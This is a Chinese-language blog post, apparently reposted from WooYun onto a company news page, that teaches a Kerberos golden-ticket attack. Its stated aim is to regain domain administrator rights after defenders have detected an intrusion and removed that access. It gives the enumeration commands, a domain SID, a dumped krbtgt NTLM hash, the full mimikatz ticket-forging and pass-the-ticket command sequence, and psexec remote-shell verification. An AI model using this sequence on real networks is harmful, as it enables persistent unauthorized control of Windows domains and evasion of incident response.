企业资讯
- 企业新闻
- 行业文章

域渗透的金之钥匙

0×00 废话连篇

最近几年很少搞内网渗透了，这几年发展的快啊，看了A牛翻译的<<Fireeye Mandiant 2014 安全报告 Part1>> ，发现趋势都是powershell脚本化了。想当年遇到的域控都是windows 2003的，找朋友要些vbscript脚本自动化，然后那啥那啥的。现在搞域除了前段时间出的MS14068，还有龙哥翻译的（http://drops.wooyun.org/papers/576）,不知道还有什么新方法，心中还有激情，如果想交流的朋友，可以加我聊聊。

0×01 金之钥匙

我原来发过一个微博说

这就是我说的金之钥匙，利用这个的条件是你在原来搞定域控的时候，已经导出过域用户的HASH，尤其是krbtgt 这个用户的。但是在你在内网干其他事情的时候，活儿不细，被人家发现了，你拥有的域管理员权限掉了，你现在还有一个普通的域用户权限，管理员做加固的时候又忘记修改krbtgt密码了（很常见），我们还是能重新回来，步骤如下：

要重新拿回域管理员权限，首先要先知道域内的管理员有谁

 C:/Users/hydra>net group “domain admins” /domain

1	C:/Users/hydra>net group “domain admins” /domain

我这里的实验环境，通过截图可以看到域管理员是administrator

我还要知道域SID是啥

 C:/Users/hydra>whoami /user

1	C:/Users/hydra>whoami /user

我的域SID是

 S-1-5-21-3883552807-251258116-2724407435

1	S-1-5-21-3883552807-251258116-2724407435

还有最重要的krbtgt用户的ntlm哈希，我原来导出的是

 krbtgt(current-disabled):502:aad3b435b51404eeaad3b435b51404ee:6a8e501fabcf264c70 ef3316c6aab7dc:::

1	krbtgt(current-disabled):502:aad3b435b51404eeaad3b435b51404ee:6a8e501fabcf264c70 ef3316c6aab7dc:::

然后该用神器mimikatz出场了，依次执行

 mimikatz # kerberos::purge mimikatz # kerberos::golden /admin:Administrator /domain:pentstlab.com /sid:S-1-5-21-3883552807-251258116-2724407435 /krbtgt:6a8e501fabcf264c70ef3316c6aab7dc /ticket:Administrator.kiribi mimikatz # kerberos::ptt Administrator.kiribi mimikatz # kerberos::tgt

mimikatz # kerberos::purge

mimikatz # kerberos::golden /admin:Administrator /domain:pentstlab.com /sid:S-1-5-21-3883552807-251258116-2724407435 /krbtgt:6a8e501fabcf264c70ef3316c6aab7dc /ticket:Administrator.kiribi

mimikatz # kerberos::ptt Administrator.kiribi

mimikatz # kerberos::tgt

到现在，我们又重新拥有域管理员权限了，可以验证下

 E:/&gt;net use //WIN-0DKN2AS0T2G/c$ E:/&gt;psexec.exe //WIN-0DKN2AS0T2G cmd

1 2	E:/>net use //WIN-0DKN2AS0T2G/c$ E:/>psexec.exe //WIN-0DKN2AS0T2G cmd

0×02 后话闲扯

呃，感觉这个方法比https://www.91ri.org/14442.html这个方便些，文章写了好久了，一直凑不出更多的字数，就没发。。嗯。。。懒了。。

[via@mickey]

注：本文系乌云官方授权转载，未经乌云官方授权请勿转载本文！

鸿大千秋网站建设团队敬上